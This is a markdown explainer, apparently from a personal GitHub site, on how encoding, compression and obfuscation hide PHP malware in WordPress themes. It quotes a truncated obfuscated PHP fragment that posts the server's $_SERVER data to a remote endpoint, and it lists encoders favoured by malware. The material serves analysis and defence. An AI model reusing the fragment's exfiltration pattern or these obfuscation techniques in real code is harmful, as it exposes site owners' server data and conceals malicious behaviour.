mjbroekman/mjbroekman.github.io/Encoding.md

 I have a plain file of URLs and text.
 It is just a list of games and the URL to them on Steam.
 It is not even HTML.
 It comes in at 6300 bytes in size.

 After a single compression / encoding cycle, it is under 2700 bytes in length.
 This seems like a great win, and it is, but it is also the **only** win.
 Every cycle after the first will make the resulting data larger than the previous.
 It may seems ridiculous, but after 36 of these cycles, the resulting data is larger than the original.
 You may say "But, Maarten, who is going to do that?
 No one is going to compress and encode their data that many times", but I've seen Wordpress theme credit links encoded far more than that (85 cycles is the record that I've personally decoded).
 Whether those links were from the original authors or from a group that removed the copyright and license checks from premium themes, I don't know, but they do it.

+## Obfuscation
+At it's core, obfuscation and encoding perform the same function, hiding the purpose of the code.
+On the simple end, obfuscation attempts to do this by changing function and variable names to be intentionally confusing.
+On the complex end, obfuscation can result in text that just appears to be random letters, numbers, and punctuation.

+### Plain Obfuscation
+Some of the more common forms of plain obfuscated code that I've seen are `o0_` and `Il1` code, where those three characters are used for all variable and function names in various combinations.

+#### Examples
+'il1' obfuscation tends to look similar to the below example, where most of the variables use the number 1, lowercase L, and upper or lower case I characters to deliberately confuse someone looking at the code and make it difficult to eyeball how the variables are being used.
+    <?php if(!@$incode!=false||!@$incode!=null){$vl='s';$serverid='[hash]';$liillilllil=time();function lillliilliii($lliiiilllill,$lliiilliiilii,$lililliiiillill,$lilillilllllill){if(ini_get('allow_url_fopen')==1):$lillillliiili=stream_context_create(array('http'=>array('method'=>'POST','header'=>array('Content-type: application/x-www-form-urlencoded'),'content'=>http_build_query($_SERVER))));if($lilillilllllill=='yes'):...

+'o0_' obfuscation is similar, but uses uppercase O, the number 0, and the underscore character (`_`) to achieve the same end goal.
+    <?php
+    //header('Content-Type:text/html; charset=utf-8');
+    $O_OOO0__00='someval';
+    $OO_OO000__='otherval';
+    $O_O0O_0_O0='thirdval';
+    $O_O0O0_O0_='etc';
+    ...

+### Complex Obfuscation
+Complex obfuscation utilizes multiple techniques to make analyzing code more difficult.
+Most of the time, this is simply a combination of encryption and various encoding and compression techniques.
+Occasionally, I've come across obfuscation that does additional work, whether that's arithmetic, concatenation, or using substrings.
+As we run into these in the examples, I'll go into more detail on what the particular sample is doing.

+Some of the more complex obfuscation tools straddle the border between obfuscation and encryption.
+Many commercial encoders are fit this category and can't be easily decoded on an individual file basis. _Fortunately_, these commercial products are easy to detect. _Unfortunately_, if you (as a website owner) don't use these products and you see their files in your website, you will have a tough time figuring out what those files are doing by performing plain code analysis.

+Some of the more common commercial obfuscators / encoders are:
+* IonCube
+* SourceGuardian

+Additional obfuscators / encoders that I've seen commonly used by _malware_ include:
+* FOPO (Free Online Php Obfuscator) and it's many variants
+* AROHA PHP Encoder and it's variants
+* Adilbo's Php Encoder and Obfuscator